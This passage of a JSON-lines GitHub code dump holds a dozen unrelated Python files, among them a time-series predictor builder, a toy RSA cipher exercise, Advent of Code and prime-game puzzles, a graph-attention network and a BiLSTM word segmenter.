predictor array. 1_D:time, 2_D:features\n \n The length of the target time series must be given (target_len).\n The start date and end date that we want to predict must be given \n (e.g., s_target_date='16-10-1980', e_target_date='16-12-2021') and\n the running window that was already applied on the predictors with center=False must be\n declared (rw_1). \n \n The predictor is selected in a way so that the \n needed date is predicted at a certain lead time (lead_time) and for a specific running\n window that was applied on the target with center=True (rw). 
If center=False, then set rw=0.\n Moreover, a selected time step for the LSTM \n is considered (ntimestep).\n '''\n \n print('starting')\n\n SDD = int(s_target_date[0:2])\n SMM = int(s_target_date[3:5])\n SYY=int(s_target_date[6:10])\n print('start target date',SDD,SMM,SYY)\n\n EDD = int(e_target_date[0:2])\n EMM = int(e_target_date[3:5])\n EYY = int(e_target_date[6:10])\n print('end target',EDD,EMM,EYY)\n\n half_rw = int(rw/2)\n \n # Create correctly formated datetime\n date_target = datetime.strftime(datetime(year=SYY,month=SMM,day=SDD), \"%Y.%m.%d\")\n \n # Initialize shape of the final predictor array\n \n pc_predictor = [] # np.ndarray((target_len,ntimestep,int(nc_in_file[var_name].shape[1])))\n time_list = []\n it = 0\n ii = 0\n YYY = SYY\n while YYY < EYY+1:\n if YYY not in [2005,2007,2018,2004,2006]:\n date_start = datetime.strftime(datetime.strptime(date_target, \"%Y.%m.%d\")- timedelta(days=half_rw+lead_time+rw_1+ntimestep-1),\"%Y.%m.%d\")\n date_end = datetime.strftime(datetime.strptime(date_target, \"%Y.%m.%d\")- timedelta(days=half_rw+lead_time+rw_1),\"%Y.%m.%d\")\n #print(date_target,date_start,date_end,it)\n f = nc_in_file.sel(time = slice(date_start,date_end))\n f=f.assign_coords(time=range(ntimestep))\n time_list.append(date_target)\n pc_predictor.append(f)\n if date_target == datetime.strftime(datetime(year=YYY,month=EMM,day=EDD),\"%Y.%m.%d\"):\n YYY = YYY+1\n date_target = datetime.strftime(datetime(year=YYY,month=SMM,day=SDD), \"%Y.%m.%d\")\n it = 0\n #print(YYY)\n else:\n it = 1\n ii = ii+1\n date_target = datetime.strftime(datetime.strptime(date_target, \"%Y.%m.%d\")+timedelta(days=it),\"%Y.%m.%d\") \n pc_predictor = xr.concat(pc_predictor,\"new_time\").rename({\"time\":\"lag\"}).rename({\"new_time\":\"time\"})\n pc_predictor = pc_predictor.assign_coords(time=time_list)\n pc_predictor = pc_predictor.assign_coords(time=pd.DatetimeIndex(pc_predictor.time)) #-pd.Timedelta(\"15 d\"))\n #print('pc_predictor_shape',pc_predictor.shape)\n return pc_predictor\n ","repo_name":"ZhengWinnieWu/Lorentz_workshop","sub_path":"L_functions.py","file_name":"L_functions.py","file_ext":"py","file_size_in_byte":3321,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"35352813903","text":"def XYToCell(self, x, y):\n # For virtual grids, XYToCell doesn't work properly\n # For some reason, the width and heights of the labels\n # are not computed properly and thw row and column\n # returned are computed as if the window wasn't\n # scrolled\n # This function replaces XYToCell for Virtual Grids\n\n rowwidth = self.GetGridRowLabelWindow().GetRect().width\n colheight = self.GetGridColLabelWindow().GetRect().height\n yunit, xunit = self.GetScrollPixelsPerUnit()\n xoff = self.GetScrollPos(wxHORIZONTAL) * xunit\n yoff = self.GetScrollPos(wxVERTICAL) * yunit\n\n # the solution is to offset the x and y values\n # by the width and height of the label windows\n # and then adjust by the scroll position\n # Then just go through the columns and rows\n # incrementing by the current column and row sizes\n # until the offset points lie within the computed\n # bounding boxes.\n x += xoff - rowwidth\n xpos = 0\n for col in range(self.GetNumberCols()):\n nextx = xpos + self.GetColSize(col) \n if xpos <= x <= nextx:\n break\n xpos = nextx\n\n y += yoff - colheight\n ypos = 0\n for row in range(self.GetNumberRows()):\n nexty = ypos + self.GetRowSize(row)\n if ypos <= y <= nexty:\n break\n ypos = nexty\n\n return row, col\n\n \t \t 
\n","repo_name":"wxWidgets/trac-attachments","sub_path":"ticket/45c/45ce120feaa2c1a2bb53db6c8fb833e58d6bb661/7c3dd4f6fb82b99043a8469a03b13ed7d8561bc9.py","file_name":"7c3dd4f6fb82b99043a8469a03b13ed7d8561bc9.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"37137386899","text":"import argparse\nparser = argparse.ArgumentParser(prog='subset_pheno_covar_by_indiv.py', description='''\n Input1: pheno_covar table obtained from ukbREST along with post-QCs\n Input2: YAML file defining which columns are phenotypes and covariates\n Input3: a list of individual ID\n Output: the phenotype and covariate for the subset of individuals\n''')\n\nparser.add_argument('--pheno-covar-csv', required=True, help='''\n Phenotype table obtained from ukbREST \n''')\nparser.add_argument('--pheno-covar-yaml', required=True, help='''\n YAML file telling which columns are phenotype and covariates\n''')\nparser.add_argument('--indiv-list', required=True, help='''\n The list of individuals (it can have several columns but the first one \n will be treated as individual ID)\n''')\nparser.add_argument('--output-pheno', required=True, help='''\n Phenotype table for subset individuals\n''')\nparser.add_argument('--output-covar', required=True, help='''\n Covariate table for subset individuals\n''')\nparser.add_argument('--indiv-colname', default='eid', help='''\n Column name of individual ID in input\n''')\n\nargs = parser.parse_args()\n\nimport pandas as pd\nimport numpy as np\nimport h5py\nimport logging, os, time, sys\nimport my_hail_helper as hail_helper\nimport gwas_helper\n\n\n# configing util\nlogging.basicConfig(\n level = logging.INFO, \n stream = sys.stderr, \n format = '%(asctime)s %(message)s',\n datefmt = '%Y-%m-%d %I:%M:%S %p'\n)\n\n# load phenotypes and covariates (Exactly the same as gwas_build_pheno_and_covar.py)\nlogging.info('Start loading phenotypes and covariates (the full table)')\npheno_covar_dic = gwas_helper.read_yaml(args.pheno_covar_yaml)\ncovar_names = pheno_covar_dic['covar_names'] # 'age_recruitment,sex,pc1,pc2'\npheno_names = pheno_covar_dic['pheno_names'] # 'ht,mcv,mch'\nindiv_id = pheno_covar_dic['indiv_id'] # 'eid'\nint_names = pheno_covar_dic['int_names'] # 'age_recruitment,sex'\nstr_names = pheno_covar_dic['str_names'] # 'eid'\nlogging.info('--> Read in CSV file as data.frame')\ntstart = time.time()\ncovar, trait = hail_helper.read_and_split_phenotype_csv(\n args.pheno_covar_csv,\n pheno_names = pheno_names,\n covar_names = covar_names,\n indiv_id = indiv_id,\n int_names = int_names,\n str_names = str_names\n)\ntend = time.time()\nlogging.info('--> Read in CSV file as data.frame FINISHED! 
{} seconds elapsed'.format(tend - tstart))\n\n# read individual list\nlogging.info('Read individual list')\nindiv_list = hail_helper.read_indiv_list(args.indiv_list)\n\n# subsetting\ntrait_sub = hail_helper.subset_by_col(trait, args.indiv_colname, indiv_list)\ncovar_sub = hail_helper.subset_by_col(covar, args.indiv_colname, indiv_list)\n\n# save as TSV\ntrait_sub.to_csv(args.output_pheno, header = True, index = None, sep = '\\t')\ncovar_sub.to_csv(args.output_covar, header = True, index = None, sep = '\\t')\n","repo_name":"liangyy/ptrs-ukb","sub_path":"code/subset_pheno_covar_by_indiv.py","file_name":"subset_pheno_covar_by_indiv.py","file_ext":"py","file_size_in_byte":2859,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"40644057541","text":"'''Import tasks for the Supernova Legacy Survey.\n'''\nimport csv\nimport os\nfrom glob import glob\nfrom math import log10\n\nfrom astrocats.catalog.utils import (get_sig_digits, pbar, pbar_strings,\n pretty_num)\nfrom astropy.time import Time as astrotime\nfrom astroquery.vizier import Vizier\n\nfrom ..supernova import SUPERNOVA\n\n\ndef do_snls_photo(catalog):\n task_str = catalog.get_current_task_str()\n snls_path = os.path.join(catalog.get_current_task_repo(), 'SNLS-ugriz.dat')\n data = list(csv.reader(open(snls_path, 'r'), delimiter=' ',\n quotechar='\"', skipinitialspace=True))\n for row in pbar(data, task_str):\n flux = row[3]\n err = row[4]\n # Being extra strict here with the flux constraint, see note below.\n if float(flux) < 3.0 * float(err):\n continue\n name = 'SNLS-' + row[0]\n name = catalog.add_entry(name)\n source = catalog.entries[name].add_source(\n bibcode='2010A&A...523A...7G')\n catalog.entries[name].add_quantity(SUPERNOVA.ALIAS, name, source)\n band = row[1]\n mjd = row[2]\n sig = get_sig_digits(flux.split('E')[0]) + 1\n # Conversion comes from SNLS-Readme\n # NOTE: Datafiles avail for download suggest diff zeropoints than 30,\n # need to inquire.\n magnitude = pretty_num(30.0 - 2.5 * log10(float(flux)), sig=sig)\n e_mag = pretty_num(\n 2.5 * log10(1.0 + float(err) / float(flux)), sig=sig)\n # e_mag = pretty_num(2.5*(log10(float(flux) + float(err)) -\n # log10(float(flux))), sig=sig)\n catalog.entries[name].add_photometry(\n time=mjd, band=band, magnitude=magnitude, e_magnitude=e_mag,\n counts=flux, e_counts=err, source=source)\n\n catalog.journal_entries()\n return\n\n\ndef do_snls_spectra(catalog):\n \"\"\"\n \"\"\"\n\n task_str = catalog.get_current_task_str()\n result = Vizier.get_catalogs('J/A+A/507/85/table1')\n table = result[list(result.keys())[0]]\n table.convert_bytestring_to_unicode(python3_only=True)\n datedict = {}\n for row in table:\n datedict['SNLS-' + row['SN']] = str(astrotime(row['Date']).mjd)\n\n oldname = ''\n file_names = glob(os.path.join(catalog.get_current_task_repo(), 'SNLS/*'))\n for fi, fname in enumerate(pbar_strings(file_names, task_str)):\n filename = os.path.basename(fname)\n fileparts = filename.split('_')\n name = 'SNLS-' + fileparts[1]\n name = catalog.get_preferred_name(name)\n if oldname and name != oldname:\n catalog.journal_entries()\n oldname = name\n name = catalog.add_entry(name)\n source = catalog.entries[name].add_source(\n bibcode='2009A&A...507...85B')\n catalog.entries[name].add_quantity(SUPERNOVA.ALIAS, name, source)\n\n catalog.entries[name].add_quantity(\n SUPERNOVA.DISCOVER_DATE, '20' + fileparts[1][:2], source)\n\n f = open(fname, 'r')\n data = csv.reader(f, delimiter=' ', skipinitialspace=True)\n specdata = []\n for 
r, row in enumerate(data):\n if row[0] == '@TELESCOPE':\n telescope = row[1].strip()\n elif row[0] == '@REDSHIFT':\n catalog.entries[name].add_quantity(\n SUPERNOVA.REDSHIFT, row[1].strip(), source)\n if r < 14:\n continue\n specdata.append(list(filter(None, [x.strip(' \\t') for x in row])))\n specdata = [list(i) for i in zip(*specdata)]\n wavelengths = specdata[1]\n\n fluxes = [pretty_num(float(x) * 1.e-16, sig=get_sig_digits(x))\n for x in specdata[2]]\n # FIX: this isnt being used\n # errors = [pretty_num(float(x)*1.e-16, sig=get_sig_digits(x)) for x in\n # specdata[3]]\n\n catalog.entries[name].add_spectrum(\n u_wavelengths='Angstrom', u_fluxes='erg/s/cm^2/Angstrom',\n wavelengths=wavelengths,\n fluxes=fluxes, u_time='MJD' if name in datedict else '',\n time=datedict[name] if name in datedict else '',\n telescope=telescope, source=source,\n filename=filename)\n if catalog.args.travis and fi >= catalog.TRAVIS_QUERY_LIMIT:\n break\n catalog.journal_entries()\n return\n","repo_name":"finzellt/novae","sub_path":"tasks/snls.py","file_name":"snls.py","file_ext":"py","file_size_in_byte":4309,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"28833424054","text":"from bs4 import BeautifulSoup\nimport requests\n\n# find the most upvoted entry\n\nresponse = requests.get(\"https://news.ycombinator.com\")\nyc_web_page = response.text\n\nsoup = BeautifulSoup(yc_web_page, \"html.parser\")\n\narticles = soup.find_all(name=\"a\", rel=\"noreferrer\")\n\n\narticle_link = []\narticle_text = []\n\nfor article_tag in articles:\n article_link.append(article_tag.get(\"href\"))\n article_text.append(article_tag.getText())\n\nupvote =[score.getText() for score in soup.find_all(name=\"span\", class_=\"score\")]\narticle_upvote = [int(score.split()[0]) for score in upvote]\n\n# print(article_text)\n# print(article_link)\n# print(article_upvote)\n\n\nindex_of_max = article_upvote.index(max(article_upvote))\nprint(index_of_max+1)\nprint(article_text[index_of_max])\nprint(article_link[index_of_max])\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"ulkat/100daysofpython","sub_path":"day-45 Web Scraping/bs4-start/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"13084985930","text":"def encode(p):\n m = ''\n for i in range(len(p)):\n a = ord(p[i])\n if a == 32:\n a = 64\n a -= 64\n if a == 0:\n m += '00'\n elif a < 10:\n m += '0' + str(a)\n else:\n m += str(a)\n\n return m\n\ndef decode(p):\n m = ''\n\n for i in range(0, len(p), 2):\n a = int(p[i:i+2]) + 64\n if a == 64:\n a = 32\n m += chr(a)\n\n return m\n\n\ndef encipher(p, n, pk):\n c = ''\n i = 0\n\n while i < len(p):\n m = ''\n for j in range(4):\n m += p[i+j]\n i += 4\n a = int(m)\n t = a\n for k in range(pk):\n b = t % n\n t = a * b\n if b < 10:\n c += '000' + str(b)\n elif b < 100:\n c += '00' + str(b)\n elif b < 1000:\n c += '0' + str(b)\n else:\n c += str(b)\n\n return c\n\ndef decipher(p, n, sk):\n c = ''\n i = 0\n\n while i < len(p):\n m = ''\n for j in range(4):\n m += p[i+j]\n i += 4\n a = int(m)\n t = a\n for k in range(sk):\n b = t % n\n t = a * b\n if b < 10:\n c += '000' + str(b)\n elif b < 100:\n c += '00' + str(b)\n elif b < 1000:\n c += '0' + str(b)\n else:\n c += str(b)\n\n return c\n\n\nplainText = 'SAVE PRIVATE RYAN '\n\nN = 3713\n# 공개키\nS = 97\n# 비밀키\nP = 37\nplainMessage = encode(plainText)\n\nprint('평문 : ', plainMessage)\ncipherMessage = 
encipher(plainMessage, N, P)\nprint('암호문 : ', cipherMessage)\ndecipherMessage = decipher(cipherMessage, N, S)\nprint('복호문 : ', decipherMessage)\n\ndecodeMessage = decode(decipherMessage)\nprint('��호된 내용 : ', decodeMessage)\n","repo_name":"EEDK/2020-2-INUCS-Algorithm","sub_path":"stringAlgorithm/RSAencipher.py","file_name":"RSAencipher.py","file_ext":"py","file_size_in_byte":1774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"10012430267","text":"def app(environ, start_response):\n \"\"\"Simplest possible application object\"\"\"\n data = environ['QUERY_STRING'].split('&')\n data = [item+'\\r\\n' for item in data]\n data = [item.encode() for item in data]\n status = '200 OK'\n response_headers = [\n ('Content-type','text/plain'),\n ]\n start_response(status, response_headers)\n return iter(data)\n","repo_name":"KostiganSavin/stepic-web","sub_path":"hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"12362960434","text":"# noqa: D205,D400\n\"\"\"\nData checks\n===========\n\nUtilities designed to check the validity of data inputs.\n\"\"\"\nfrom __future__ import annotations\n\nfrom typing import Sequence\n\nimport xarray as xr\n\nfrom .calendar import compare_offsets, parse_offset\nfrom .options import datacheck\nfrom .utils import ValidationError\n\n\n@datacheck\ndef check_freq(var: xr.DataArray, freq: str | Sequence[str], strict: bool = True):\n \"\"\"Raise an error if not series has not the expected temporal frequency or is not monotonically increasing.\n\n Parameters\n ----------\n var : xr.DataArray\n Input array.\n freq : str or sequence of str\n The expected temporal frequencies, using Pandas frequency terminology ({'A', 'M', 'D', 'H', 'T', 'S', 'L', 'U'})\n and multiples thereof. To test strictly for 'W', pass '7D' with `strict=True`.\n This ignores the start flag and the anchor (ex: 'AS-JUL' will validate against 'Y').\n strict : bool\n Whether multiples of the frequencies are considered invalid or not. With `strict` set to False, a '3H' series\n will not raise an error if freq is set to 'H'.\n \"\"\"\n if isinstance(freq, str):\n freq = [freq]\n exp_base = [parse_offset(frq)[1] for frq in freq]\n v_freq = xr.infer_freq(var.time)\n if v_freq is None:\n raise ValidationError(\n \"Unable to infer the frequency of the time series. \"\n \"To mute this, set xclim's option data_validation='log'.\"\n )\n v_base = parse_offset(v_freq)[1]\n if v_base not in exp_base or (\n strict and all(compare_offsets(v_freq, \"!=\", frq) for frq in freq)\n ):\n raise ValidationError(\n f\"Frequency of time series not {'strictly' if strict else ''} in {freq}. 
\"\n \"To mute this, set xclim's option data_validation='log'.\"\n )\n\n\ndef check_daily(var: xr.DataArray):\n \"\"\"Raise an error if not series has a frequency other that daily, or is not monotonically increasing.\n\n Notes\n -----\n This does not check for gaps in series.\n \"\"\"\n return check_freq(var, \"D\")\n","repo_name":"dougiesquire/xclim","sub_path":"xclim/core/datachecks.py","file_name":"datachecks.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"16"} +{"seq_id":"70101000009","text":"\"\"\" Day 14: Reindeer Olympics\n\nAuthor: Ic4r0 - https://github.com/Ic4r0\n\nCreated: 10th December 2021\n\"\"\"\n\n# imports\nfrom utils.parse_input import parse_by_line\nfrom re import match\n\n\n# modules\ndef compute_space(reindeer: dict, max_time: int) -> int:\n \"\"\" Compute traveled distance of a single reindeer\n\n :param reindeer: dict containing info about reindeer\n :param max_time: observation period\n :return: numeric result\n \"\"\"\n distance = 0\n time = 0\n while time < max_time:\n if time + reindeer['time'] > max_time:\n distance += (max_time - time) * reindeer['speed']\n else:\n distance += reindeer['time'] * reindeer['speed']\n time += reindeer['time'] + reindeer['rest']\n return distance\n\n\ndef part_1(reindeer: dict, is_test: bool) -> int:\n \"\"\" Code for the 1st part of the 14th day of Advent of Code\n\n :param reindeer: dict containing info about reindeer\n :param is_test: flag to use test max_time\n :return: numeric result\n \"\"\"\n max_time = 1000 if is_test else 2503\n distances = []\n for single_reindeer in reindeer.keys():\n distances.append(compute_space(reindeer[single_reindeer], max_time))\n return max(distances)\n\n\ndef part_2(reindeer: dict, is_test: bool) -> int:\n \"\"\" Code for the 2nd part of the 14th day of Advent of Code\n\n :param reindeer: dict containing info about reindeer\n :param is_test: flag to use test max_time\n :return: numeric result\n \"\"\"\n max_time = 1000 if is_test else 2503\n reindeer_list = reindeer.keys()\n points = {single_reindeer: 0 for single_reindeer in reindeer_list}\n for second in range(1, max_time):\n results_by_seconds = []\n for single_reindeer in reindeer_list:\n results_by_seconds.append(compute_space(reindeer[single_reindeer], second))\n max_values_names = [\n list(reindeer_list)[idx] for idx, result in enumerate(results_by_seconds)\n if result == max(results_by_seconds)\n ]\n for name in max_values_names:\n points[name] += 1\n\n return max(points.values())\n\n\ndef day_14(selected_part: int = None, test: bool = False):\n \"\"\" Needed to select which part of the 14th day we want to execute\n\n :param selected_part: selected Advent of Code part of the 14th day\n :param test: flag to use test input\n \"\"\"\n input_list = parse_by_line(14, int_list=False, is_test=test)\n reindeer = dict()\n for line in input_list:\n matches = match(r'(\\w+) can fly (\\d+) km/s for (\\d+) seconds, but then must rest for (\\d+) seconds.', line)\n name, speed, time, rest = matches.groups()\n reindeer[name] = {\n 'speed': int(speed),\n 'time': int(time),\n 'rest': int(rest),\n }\n\n if selected_part == 1 or not selected_part:\n result_part_1 = part_1(reindeer, is_test=test)\n print('The result of 1st part of the 14th day of AoC is: ' + str(result_part_1))\n if selected_part == 2 or not selected_part:\n result_part_2 = part_2(reindeer, is_test=test)\n print('The result of 2nd part of the 14th day of AoC is: ' + 
str(result_part_2))\n","repo_name":"Ic4r0/advent_of_code2015","sub_path":"days/day_14.py","file_name":"day_14.py","file_ext":"py","file_size_in_byte":3149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70545685449","text":"import torch\nimport torch.nn as nn\nfrom torch.nn.parameter import Parameter\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\n\n\n\nclass GraphAttentionLayer(nn.Module):\n\n def __init__(self, requires_grad=True):\n super(GraphAttentionLayer, self).__init__()\n if requires_grad:\n # unifrom initialization\n self.beta = Parameter(torch.Tensor(1).uniform_(\n 0, 1), requires_grad=requires_grad)\n else:\n self.beta = Variable(torch.zeros(1), requires_grad=requires_grad)\n\n def forward(self, x, adj, aff_cropping):\n\n norm2 = torch.norm(x, 2, 1).view(-1, 1)\n cos = torch.div(torch.mm(x, x.t()), torch.mm(norm2, norm2.t()) + 1e-7)\n\n mask = torch.zeros_like(aff_cropping).cuda()\n mask[aff_cropping == 0] = -1e9\n mask[cos<0] = -1e9\n cos = self.beta.cuda() * cos\n masked = cos + mask + 10 * adj\n\n # propagation matrix\n P = F.softmax(masked, dim=1)\n\n # attention-guided propagation\n output = torch.mm(P, x)\n return output\n\n def __repr__(self):\n return self.__class__.__name__ + ' (16 -> 16)'\n\n\nclass LinearLayer(nn.Module):\n\n def __init__(self, in_features, out_features, initializer=nn.init.xavier_uniform_):\n super(LinearLayer, self).__init__()\n self.in_features = in_features\n self.out_features = out_features\n self.weight = Parameter(initializer(\n torch.Tensor(in_features, out_features)))\n\n def forward(self, input):\n # no bias\n return torch.mm(input, self.weight)\n\n def __repr__(self):\n return self.__class__.__name__ + ' (' \\\n + str(self.in_features) + ' -> ' \\\n + str(self.out_features) + ')'\n\n\nclass A2GNN(nn.Module):\n\n def __init__(self, nfeat, nhid, nclass, nlayers, dropout_rate):\n super(A2GNN, self).__init__()\n\n self.layers = nlayers\n self.dropout_rate = dropout_rate\n\n self.embeddinglayer = LinearLayer(nfeat, nhid)\n nn.init.xavier_uniform_(self.embeddinglayer.weight)\n\n self.attentionlayers = nn.ModuleList()\n # for Cora dataset, the first propagation layer is non-trainable\n # and beta is fixed at 0\n self.attentionlayers.append(GraphAttentionLayer(requires_grad=True))\n for i in range(1, self.layers):\n self.attentionlayers.append(GraphAttentionLayer())\n\n self.outputlayer = LinearLayer(nhid, nclass)\n nn.init.xavier_uniform_(self.outputlayer.weight)\n\n def forward(self, x, adj, aff_cropping):\n x = F.relu(self.embeddinglayer(x))\n x = F.dropout(x, self.dropout_rate, training=self.training)\n\n for i in range(self.layers):\n x = self.attentionlayers[i](x, adj, aff_cropping)\n fts = x.clone()\n\n x = self.outputlayer(x)\n\n return x,fts\n","repo_name":"zbf1991/A2GNN","sub_path":"pygcn/A2GNN.py","file_name":"A2GNN.py","file_ext":"py","file_size_in_byte":2862,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"16"} +{"seq_id":"39737261139","text":"#!/usr/bin/python\n# encoding: utf-8\n\n\"\"\"\n@author: Ian\n@contact:yongguiluo@hotmail.com\n@file: bilstm_seq2seq.py\n@time: 2019/3/11 17:02\n\"\"\"\nimport re\nimport numpy as np\nimport pandas as pd\nfrom mayiutils.file_io.pickle_wrapper import PickleWrapper as picklew\nimport tensorflow as tf\nfrom tensorflow.keras.layers import Dense, Embedding, LSTM, TimeDistributed, Input, Bidirectional\nfrom tensorflow.keras.models import Model, load_model\n\n\ndef 
clean(s): #整理一下数据,有些不规范的地方\n if '“/s' not in s:\n return s.replace(' ”/s', '')\n elif '”/s' not in s:\n return s.replace('“/s ', '')\n elif '‘/s' not in s:\n return s.replace(' ’/s', '')\n elif '’/s' not in s:\n return s.replace('‘/s ', '')\n else:\n return s\n\n\ndef get_xy(s):\n \"\"\"\n 获取word序列和label序列\n\n :param s:\n :return:\n (['“', '人', '们', '常', '说', '生', '活', '是', '一', '部', '教', '科', '书'],\n ['s', 'b', 'e', 's', 's', 'b', 'e', 's', 's', 's', 'b', 'm', 'e'])\n \"\"\"\n s = re.findall('(.)/(.)', s)\n # print(s)\n if s:\n s = np.array(s)\n return list(s[:, 0]), list(s[:, 1])\n\n\ndef trans_one(x):\n \"\"\"\n 把label ['s', 'b'...]转换为one-hot形式\n :param x:\n :return:\n \"\"\"\n _ = map(lambda y: tf.keras.utils.to_categorical(y,5), tag[x].values.reshape((-1,1)))\n _ = list(_)\n _.extend([np.array([[0,0,0,0,1]])]*(maxlen-len(x)))\n return np.array(_)\n#转移概率,单纯用了等概率\nzy = {'be':0.5,\n 'bm':0.5,\n 'eb':0.5,\n 'es':0.5,\n 'me':0.5,\n 'mm':0.5,\n 'sb':0.5,\n 'ss':0.5\n }\n\nzy = {i:np.log(zy[i]) for i in zy.keys()}\n\n\ndef viterbi(nodes):\n paths = {'b': nodes[0]['b'], 's': nodes[0]['s']}\n for l in range(1,len(nodes)):\n paths_ = paths.copy()\n paths = {}\n for i in nodes[l].keys():\n nows = {}\n for j in paths_.keys():\n if j[-1]+i in zy.keys():\n nows[j+i] = paths_[j]+nodes[l][i]+zy[j[-1]+i]\n k = np.argmax(list(nows.values()))\n paths[list(nows.keys())[k]] = list(nows.values())[k]\n return list(paths.keys())[np.argmax(paths.values())]\n\n\ndef simple_cut(s):\n if s:\n r = model.predict(np.array([list(chars[list(s)].fillna(0).astype(int))+[0]*(maxlen-len(s))]), verbose=False)[0][:len(s)]\n # print(type(r), r.shape, r[:2])\n # return\n r = np.log(r)\n nodes = [dict(zip(['s', 'b', 'm', 'e'], i[:4])) for i in r]\n t = viterbi(nodes)\n words = []\n for i in range(len(s)):\n if t[i] in ['s', 'b']:\n words.append(s[i])\n else:\n words[-1] += s[i]\n return words\n else:\n return []\n\n\nnot_cuts = re.compile(r'([\\da-zA-Z ]+)|[。,、?!.?,!]')\n\n\ndef cut_word(s):\n result = []\n j = 0\n for i in not_cuts.finditer(s):\n result.extend(simple_cut(s[j:i.start()]))\n result.append(s[i.start():i.end()])\n j = i.end()\n result.extend(simple_cut(s[j:]))\n return result\n\n\nif __name__ == '__main__':\n mode = 2\n chars = picklew.loadFromFile('chars.pkl')\n maxlen = 32\n if mode == 2:\n model = load_model('model.h5')\n simple_cut('苏剑林是科学空间的博主')\n print(cut_word('苏剑林是科学空间的博主'))\n print(cut_word('你是真的遇到过报错了'))\n print(cut_word('列夫·托尔斯泰是俄罗斯一位著名的作家'))\n if mode == 1:\n \"\"\"\n train model\n \"\"\"\n s = open('msr_train.txt', encoding='gbk').read()\n s = s.split('\\r\\n')\n # print(s[0])\n s = ''.join(map(clean, s))\n s = re.split(r'[,。!?、]/[bems]', s)\n print(s[0])\n data = [] # 生成训练样本\n label = []\n for i in s:\n x = get_xy(i)\n if x:\n data.append(x[0])\n label.append(x[1])\n\n d = pd.DataFrame(index=range(len(data)))\n d['data'] = data\n d['label'] = label\n # print(d.head())\n \"\"\"\n 抛弃了多于32字的样本,这部分样本很少,事实上,用逗号、句号等天然分隔符分开后,句子很少有多于32字的。\n \"\"\"\n\n d = d[d['data'].apply(len) <= maxlen]\n d.index = range(len(d))\n \"\"\"\n 这次我用了5tag,在原来的4tag的基础上,加上了一个x标签,\n 用来表示不够32字的部分,比如句子是20字的,那么第21~32个标签均为x。\n \"\"\"\n tag = pd.Series({'s': 0, 'b': 1, 'm': 2, 'e': 3, 'x': 4})\n chars = [] # 统计所有字,跟每个字编号\n for i in data:\n chars.extend(i)\n # 按照词频出现的高低给word编号\n chars = pd.Series(chars).value_counts().sort_values(ascending=False)\n chars[:] = range(1, len(chars) + 1)\n picklew.dump2File(chars, 'chars.pkl')\n # # 生成适���模型输入的格式\n # d['x'] = d['data'].apply(lambda x: np.array(list(chars[x]) + [0] * (maxlen - len(x))))\n 
#\n # d['y'] = d['label'].apply(trans_one)\n\n # picklew.dump2File(d, 'd.pkl')\n d = picklew.loadFromFile('d.pkl')\n # 设计模型\n word_size = 128\n maxlen = 32\n\n sequence = Input(shape=(maxlen,), dtype='int32')\n embedded = Embedding(len(chars) + 1, word_size, input_length=maxlen, mask_zero=True)(sequence)\n blstm = Bidirectional(LSTM(64, return_sequences=True), merge_mode='sum')(embedded)\n output = TimeDistributed(Dense(5, activation='softmax'))(blstm)\n model = Model(inputs=sequence, outputs=output)\n model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n\n print(model.summary())\n \"\"\"\n _________________________________________________________________\n Layer (type) Output Shape Param # \n =================================================================\n input_1 (InputLayer) (None, 32) 0 \n _________________________________________________________________\n embedding (Embedding) (None, 32, 128) 660864 \n _________________________________________________________________\n bidirectional (Bidirectional (None, 32, 64) 98816 \n _________________________________________________________________\n time_distributed (TimeDistri (None, 32, 5) 325 \n =================================================================\n Total params: 760,005\n Trainable params: 760,005\n Non-trainable params: 0\n _________________________________________________________________\n None\n \"\"\"\n batch_size = 1024\n history = model.fit(np.array(list(d['x'])), np.array(list(d['y'])).reshape((-1, maxlen, 5)), batch_size=batch_size,\n nb_epoch=50)\n model.save('model.h5')\n\n\n\n\n\n\n\n\n\n\n","repo_name":"mayi140611/mayiutils","sub_path":"apps/lstmtest/bilstm_seq2seq.py","file_name":"bilstm_seq2seq.py","file_ext":"py","file_size_in_byte":7085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70253672008","text":"#!/usr/bin/python3\n\"\"\"a module with a prime number game\"\"\"\n\n\ndef is_prime(num):\n \"\"\"checks if the number us prime\"\"\"\n if num <= 1:\n return False\n if num <= 3:\n return True\n if num % 2 == 0 or num % 3 == 0:\n return False\n i = 5\n while i * i <= num:\n if num % i == 0 or num % (i + 2) == 0:\n return False\n i += 6\n return True\n\n\ndef isWinner(x, nums):\n \"\"\"determines the winner\"\"\"\n maria_wins = 0\n ben_wins = 0\n\n for n in nums:\n # Count the number of prime numbers in the range [1, n]\n prime_count = sum(1 for i in range(1, n + 1) if is_prime(i))\n\n # If the number of prime numbers is odd, Maria wins\n # If the number of prime numbers is even, Ben wins\n if prime_count % 2 == 1:\n maria_wins += 1\n else:\n ben_wins += 1\n\n if maria_wins > ben_wins:\n return \"Maria\"\n elif ben_wins > maria_wins:\n return \"Ben\"\n else:\n return None\n","repo_name":"Mmah-Zombo/alx-interview","sub_path":"0x0A-primegame/0-prime_game.py","file_name":"0-prime_game.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"2478278175","text":"import json\r\nimport 